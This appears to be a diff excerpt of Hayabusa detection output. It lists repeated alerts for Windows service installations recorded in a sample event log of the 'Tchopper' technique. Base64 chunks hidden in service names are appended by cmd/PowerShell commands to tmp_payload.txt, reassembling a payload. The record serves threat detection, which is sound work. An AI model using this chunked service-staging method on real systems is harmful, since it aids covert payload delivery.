+2021-11-03 17:18:50.135 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VmFsdWUuQXBwbGljYXRpb25FUFM7ICJBcHBsaWNhdGlvbiAxc3QgRXZlbnQiID0gJGJveC5WYWx1ZS5BcHBsaWNhdGlvbkZpcnN0RXZlbnRUaW1lOyAiQXBwbGljYXRpb24gbGFzdCBFdmVudCIgPS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg149"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:50.135 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: VmFsdWUuQXBwbGljYXRpb25FUFM7ICJBcHBsaWNhdGlvbiAxc3QgRXZlbnQiID0gJGJveC5WYWx1ZS5BcHBsaWNhdGlvbkZpcnN0RXZlbnRUaW1lOyAiQXBwbGljYXRpb24gbGFzdCBFdmVudCIgPS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg149"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:50.135 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VmFsdWUuQXBwbGljYXRpb25FUFM7ICJBcHBsaWNhdGlvbiAxc3QgRXZlbnQiID0gJGJveC5WYWx1ZS5BcHBsaWNhdGlvbkZpcnN0RXZlbnRUaW1lOyAiQXBwbGljYXRpb24gbGFzdCBFdmVudCIgPS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg149"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:51.588 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AkYm94LlZhbHVlLkFwcGxpY2F0aW9uTGFzdEV2ZW50VGltZTsgIkFwcGxpY2F0aW9uIHRvdGFsIGV2ZW50cyIgPSAkYm94LlZhbHVlLkFwcGxpY2F0aW9uVG90YWxFdmVudHM7ICJBcHBsaWNhdGlv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg150"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:51.588 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AkYm94LlZhbHVlLkFwcGxpY2F0aW9uTGFzdEV2ZW50VGltZTsgIkFwcGxpY2F0aW9uIHRvdGFsIGV2ZW50cyIgPSAkYm94LlZhbHVlLkFwcGxpY2F0aW9uVG90YWxFdmVudHM7ICJBcHBsaWNhdGlv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg150"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:51.588 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AkYm94LlZhbHVlLkFwcGxpY2F0aW9uTGFzdEV2ZW50VGltZTsgIkFwcGxpY2F0aW9uIHRvdGFsIGV2ZW50cyIgPSAkYm94LlZhbHVlLkFwcGxpY2F0aW9uVG90YWxFdmVudHM7ICJBcHBsaWNhdGlv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg150"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:53.026 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: biBMb2cgU2l6ZSAoTUIpIiA9ICRib3guVmFsdWUuQXBwbGljYXRpb25FdmVudExvZ1NpemU7DQogICAgICAgICAgICAiU2VjdXJpdHkgKEVQUykiID0gJGJveC5WYWx1ZS5TZWN1cml0eUVQUzsgIl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg151"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:53.026 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: biBMb2cgU2l6ZSAoTUIpIiA9ICRib3guVmFsdWUuQXBwbGljYXRpb25FdmVudExvZ1NpemU7DQogICAgICAgICAgICAiU2VjdXJpdHkgKEVQUykiID0gJGJveC5WYWx1ZS5TZWN1cml0eUVQUzsgIl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg151"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:53.026 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: biBMb2cgU2l6ZSAoTUIpIiA9ICRib3guVmFsdWUuQXBwbGljYXRpb25FdmVudExvZ1NpemU7DQogICAgICAgICAgICAiU2VjdXJpdHkgKEVQUykiID0gJGJveC5WYWx1ZS5TZWN1cml0eUVQUzsgIl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg151"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:54.457 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: NlY3VyaXR5IDFzdCBFdmVudCIgPSAkYm94LlZhbHVlLlNlY3VyaXR5Rmlyc3RFdmVudFRpbWU7ICJTZWN1cml0eSBsYXN0IEV2ZW50IiA9ICRib3guVmFsdWUuU2VjdXJpdHlMYXN0RXZlbnRUaW1l | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg152"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:54.457 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: NlY3VyaXR5IDFzdCBFdmVudCIgPSAkYm94LlZhbHVlLlNlY3VyaXR5Rmlyc3RFdmVudFRpbWU7ICJTZWN1cml0eSBsYXN0IEV2ZW50IiA9ICRib3guVmFsdWUuU2VjdXJpdHlMYXN0RXZlbnRUaW1l | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg152"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:54.457 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: NlY3VyaXR5IDFzdCBFdmVudCIgPSAkYm94LlZhbHVlLlNlY3VyaXR5Rmlyc3RFdmVudFRpbWU7ICJTZWN1cml0eSBsYXN0IEV2ZW50IiA9ICRib3guVmFsdWUuU2VjdXJpdHlMYXN0RXZlbnRUaW1l | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg152"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:55.903 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: OyAiU2VjdXJpdHkgdG90YWwgZXZlbnRzIiA9ICRib3guVmFsdWUuU2VjdXJpdHlUb3RhbEV2ZW50czsgIlNlY3VyaXR5IExvZyBTaXplIChNQikiID0gJGJveC5WYWx1ZS5TZWN1cml0eUV2ZW50TG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg153"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:55.903 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: OyAiU2VjdXJpdHkgdG90YWwgZXZlbnRzIiA9ICRib3guVmFsdWUuU2VjdXJpdHlUb3RhbEV2ZW50czsgIlNlY3VyaXR5IExvZyBTaXplIChNQikiID0gJGJveC5WYWx1ZS5TZWN1cml0eUV2ZW50TG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg153"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:55.903 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: OyAiU2VjdXJpdHkgdG90YWwgZXZlbnRzIiA9ICRib3guVmFsdWUuU2VjdXJpdHlUb3RhbEV2ZW50czsgIlNlY3VyaXR5IExvZyBTaXplIChNQikiID0gJGJveC5WYWx1ZS5TZWN1cml0eUV2ZW50TG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg153"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:57.355 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 9nU2l6ZTsgDQogICAgICAgICAgICAiU3lzdGVtIChFUFMpIiA9ICRib3guVmFsdWUuU3lzdGVtRVBTOyAiU3lzdGVtIDFzdCBFdmVudCIgPSAkYm94LlZhbHVlLlN5c3RlbUZpcnN0RXZlbnRUaW1l | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg154"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:57.355 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 9nU2l6ZTsgDQogICAgICAgICAgICAiU3lzdGVtIChFUFMpIiA9ICRib3guVmFsdWUuU3lzdGVtRVBTOyAiU3lzdGVtIDFzdCBFdmVudCIgPSAkYm94LlZhbHVlLlN5c3RlbUZpcnN0RXZlbnRUaW1l | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg154"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:57.355 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 9nU2l6ZTsgDQogICAgICAgICAgICAiU3lzdGVtIChFUFMpIiA9ICRib3guVmFsdWUuU3lzdGVtRVBTOyAiU3lzdGVtIDFzdCBFdmVudCIgPSAkYm94LlZhbHVlLlN5c3RlbUZpcnN0RXZlbnRUaW1l | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg154"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:58.798 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: OyAiU3lzdGVtIGxhc3QgRXZlbnQiID0gJGJveC5WYWx1ZS5TeXN0ZW1MYXN0RXZlbnRUaW1lOyAiU3lzdGVtIHRvdGFsIGV2ZW50cyIgPSAkYm94LlZhbHVlLlN5c3RlbVRvdGFsRXZlbnRzOyAiU3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg155"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:58.798 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: OyAiU3lzdGVtIGxhc3QgRXZlbnQiID0gJGJveC5WYWx1ZS5TeXN0ZW1MYXN0RXZlbnRUaW1lOyAiU3lzdGVtIHRvdGFsIGV2ZW50cyIgPSAkYm94LlZhbHVlLlN5c3RlbVRvdGFsRXZlbnRzOyAiU3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg155"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:58.798 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: OyAiU3lzdGVtIGxhc3QgRXZlbnQiID0gJGJveC5WYWx1ZS5TeXN0ZW1MYXN0RXZlbnRUaW1lOyAiU3lzdGVtIHRvdGFsIGV2ZW50cyIgPSAkYm94LlZhbHVlLlN5c3RlbVRvdGFsRXZlbnRzOyAiU3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg155"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:00.236 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: lzdGVtIExvZyBTaXplIChNQikiID0gJGJveC5WYWx1ZS5TeXN0ZW1FdmVudExvZ1NpemU7DQogICAgICAgICAgICAiVG90YWwgKEVQUykiID0gJGJveC5WYWx1ZS5Ub3RhbEVQUzsgIlByb2ZpbGUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg156"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:00.236 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: lzdGVtIExvZyBTaXplIChNQikiID0gJGJveC5WYWx1ZS5TeXN0ZW1FdmVudExvZ1NpemU7DQogICAgICAgICAgICAiVG90YWwgKEVQUykiID0gJGJveC5WYWx1ZS5Ub3RhbEVQUzsgIlByb2ZpbGUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg156"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:00.236 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: lzdGVtIExvZyBTaXplIChNQikiID0gJGJveC5WYWx1ZS5TeXN0ZW1FdmVudExvZ1NpemU7DQogICAgICAgICAgICAiVG90YWwgKEVQUykiID0gJGJveC5WYWx1ZS5Ub3RhbEVQUzsgIlByb2ZpbGUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg156"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:01.719 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: U3VnZ2VzdGlvbiAoMyBTZWMgUG9sbGluZyBJbnRlcnZhbCkiID0gJGJveC5WYWx1ZS5Qcm9maWxlU3VnZ2VzdGlvbjt9KQ0KDQogICAgICAgIH0NCg0KDQogICAgICAgIFdyaXRlLUxvZyAkSU5QVV | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg157"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:01.719 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: U3VnZ2VzdGlvbiAoMyBTZWMgUG9sbGluZyBJbnRlcnZhbCkiID0gJGJveC5WYWx1ZS5Qcm9maWxlU3VnZ2VzdGlvbjt9KQ0KDQogICAgICAgIH0NCg0KDQogICAgICAgIFdyaXRlLUxvZyAkSU5QVV | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg157"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:01.719 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: U3VnZ2VzdGlvbiAoMyBTZWMgUG9sbGluZyBJbnRlcnZhbCkiID0gJGJveC5WYWx1ZS5Qcm9maWxlU3VnZ2VzdGlvbjt9KQ0KDQogICAgICAgIH0NCg0KDQogICAgICAgIFdyaXRlLUxvZyAkSU5QVV | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg157"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:03.160 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RfTE9HICJTZWxlY3QgRXZlbnQgTG9nIEV4cG9ydCBMb2NhdGlvbi4uLiINCg0KICAgICAgICAkRXhwb3J0Rm9sZGVyID0gU2VsZWN0LUV4cG9ydExvY2F0aW9uICJFdmVudCBMb2cgU3VtbWFyeSBS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg158"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:03.160 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: RfTE9HICJTZWxlY3QgRXZlbnQgTG9nIEV4cG9ydCBMb2NhdGlvbi4uLiINCg0KICAgICAgICAkRXhwb3J0Rm9sZGVyID0gU2VsZWN0LUV4cG9ydExvY2F0aW9uICJFdmVudCBMb2cgU3VtbWFyeSBS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg158"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:03.160 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RfTE9HICJTZWxlY3QgRXZlbnQgTG9nIEV4cG9ydCBMb2NhdGlvbi4uLiINCg0KICAgICAgICAkRXhwb3J0Rm9sZGVyID0gU2VsZWN0LUV4cG9ydExvY2F0aW9uICJFdmVudCBMb2cgU3VtbWFyeSBS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg158"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:04.601 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZXBvcnQgRXhwb3J0IExvY2F0aW9uIiAiRGVza3RvcCINCiAgICAgICAgDQogICAgICAgICRFeHBvcnRMb2NhdGlvbiA9ICRFeHBvcnRGb2xkZXIgKyAiXEV2ZW50LUxvZy1TdW1tYXJ5LVJlcG9ydC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg159"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:04.601 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZXBvcnQgRXhwb3J0IExvY2F0aW9uIiAiRGVza3RvcCINCiAgICAgICAgDQogICAgICAgICRFeHBvcnRMb2NhdGlvbiA9ICRFeHBvcnRGb2xkZXIgKyAiXEV2ZW50LUxvZy1TdW1tYXJ5LVJlcG9ydC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg159"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:04.601 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZXBvcnQgRXhwb3J0IExvY2F0aW9uIiAiRGVza3RvcCINCiAgICAgICAgDQogICAgICAgICRFeHBvcnRMb2NhdGlvbiA9ICRFeHBvcnRGb2xkZXIgKyAiXEV2ZW50LUxvZy1TdW1tYXJ5LVJlcG9ydC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg159"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:06.043 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0iICsgJChnZXQtZGF0ZSAtZiB5eXl5TU1kZGhobW1zcykgKyAiLmNzdiIgICAgICAgICAgICANCiAgICAgICAgICAgICAgICANCiAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiRXhwb3J0aW5n | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg160"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:06.043 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 0iICsgJChnZXQtZGF0ZSAtZiB5eXl5TU1kZGhobW1zcykgKyAiLmNzdiIgICAgICAgICAgICANCiAgICAgICAgICAgICAgICANCiAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiRXhwb3J0aW5n | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg160"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:06.043 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0iICsgJChnZXQtZGF0ZSAtZiB5eXl5TU1kZGhobW1zcykgKyAiLmNzdiIgICAgICAgICAgICANCiAgICAgICAgICAgICAgICANCiAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiRXhwb3J0aW5n | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg160"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
